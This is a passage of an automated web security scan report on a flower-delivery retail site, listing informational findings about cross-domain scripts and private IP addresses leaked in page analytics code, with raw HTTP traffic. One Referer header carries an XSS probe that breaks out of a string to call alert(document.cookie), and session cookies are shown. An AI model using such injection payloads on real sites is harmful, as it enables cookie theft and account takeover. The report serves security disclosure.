Cookie: ARPT=IZJPJPS192.168.100.70CKOMM; PHPSESSID=be5eceddad9804e3c8f89291e0dce73f; ref_code=ORD; s_cc=true; s_sq=proflodevelopment%3D%2526pid%253Dfle%25253Aproduct%25253AFYF-MIXTUL%2526pidt%253D1%2526oid%253Dhttp%25253A//a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/btn_buynow.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:54:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 13251

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
<div id="navPad">
<script language="javascript" type="text/javascript" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/js/topNav.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/s_code.js"></script>
...[SNIP]...

5.3. http://www.floristexpress.net/products/tulip_rainbow.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /products/tulip_rainbow.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/tulip_rainbow.htm HTTP/1.1
Host: www.floristexpress.net
Proxy-Connection: keep-alive
Referer: http://www.floristexpress.net/?refcode=ORD&RefPage=pfc_PRODUCT-30050119
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=IZJPJPS192.168.100.70CKOMM; PHPSESSID=be5eceddad9804e3c8f89291e0dce73f; ref_code=ORD; s_cc=true; s_sq=proflodevelopment%3D%2526pid%253Dfle%25253Alanding%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.floristexpress.net/products/tulip_rainbow.htm%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:53:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 32379

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Tulip Rainbow at FloristExpress.Net<
...[SNIP]...
<div id="navPad">
<script language="javascript" type="text/javascript" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/js/topNav.js"></script>
...[SNIP]...
</style>
<script language="javascript" type="text/javascript" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/js/products.js"></script>
<script language="javascript" type="text/javascript" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/js/jquery-1.3.2.min.js"></script>
<script language="javascript" type="text/javascript" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/js/jquery.bgiframe.js"></script>
<script language="javascript" type="text/javascript" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/js/fsh.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/s_code.js"></script>
...[SNIP]...

6. Private IP addresses disclosed  previous
There are 3 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


6.1. http://www.floristexpress.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /?refcode=ORD&RefPage=pfc_PRODUCT-30050119 HTTP/1.1
Host: www.floristexpress.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rrefbdf\%22%3balert(document.cookie)//5e820bfb5e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=IZJPJPS192.168.100.210CKOUU; path=/
Date: Fri, 11 Feb 2011 18:53:51 GMT
Server: Apache
Set-Cookie: PHPSESSID=68ab3544b96e60a3e65d7fb635fc5b2a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=227e64ab9387a195da7e801f19393cb9; path=/
Set-Cookie: ref_code=ORD; path=/
Content-Type: text/html
Content-Length: 102803

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
<script language="JavaScript">
s.pageName="fle:landing:home";
s.server="192.168.100.210";
s.channel="fle:landing";
s.pageType="";
s.events="";

s.prop1="fle:landing:home";
s.prop2="10:30AM";
s.prop10="";
s.prop20="";
s.prop11="FLE";
s.prop12="True";
s.prop13="False";
s.prop14="True";

s.
...[SNIP]...

6.2. http://www.floristexpress.net/cart.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /cart.htm

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /cart.htm HTTP/1.1
Host: www.floristexpress.net
Proxy-Connection: keep-alive
Referer: http://www.floristexpress.net/products/tulip_rainbow.htm
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=IZJPJPS192.168.100.70CKOMM; PHPSESSID=be5eceddad9804e3c8f89291e0dce73f; ref_code=ORD; s_cc=true; s_sq=proflodevelopment%3D%2526pid%253Dfle%25253Aproduct%25253AFYF-MIXTUL%2526pidt%253D1%2526oid%253Dhttp%25253A//a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/btn_buynow.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:54:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 13251

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
<script language="JavaScript">
s.pageName="fle:cart";
s.server="192.168.100.70";
s.channel="fle:cart";
s.pageType="";
s.events="event6";

s.prop1="fle:cart";
s.prop2="10:30AM";
s.prop10="";
s.prop20="";
s.prop11="FLE";
s.prop12="True";
s.prop13="False";
s.prop14="True";

s.eVar4
...[SNIP]...

6.3. http://www.floristexpress.net/products/tulip_rainbow.htm  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /products/tulip_rainbow.htm

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /products/tulip_rainbow.htm HTTP/1.1
Host: www.floristexpress.net
Proxy-Connection: keep-alive
Referer: http://www.floristexpress.net/?refcode=ORD&RefPage=pfc_PRODUCT-30050119
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=IZJPJPS192.168.100.70CKOMM; PHPSESSID=be5eceddad9804e3c8f89291e0dce73f; ref_code=ORD; s_cc=true; s_sq=proflodevelopment%3D%2526pid%253Dfle%25253Alanding%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.floristexpress.net/products/tulip_rainbow.htm%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:53:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 32379

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Tulip Rainbow at FloristExpress.Net<
...[SNIP]...
<script language="JavaScript">
s.pageName="fle:product:FYF-MIXTUL";
s.server="192.168.100.70";
s.channel="fle:product";
s.pageType="";
s.events="prodView,event5";

s.prop1="fle:product";
s.prop2="10:30AM";
s.prop10="";
s.prop20="";
s.prop11="FLE";
s.prop12="True";
s.prop13="False";
s.prop14="
...[SNIP]...

Report generated by XSS.CX Research Blog at Fri Feb 11 13:15:24 CST 2011.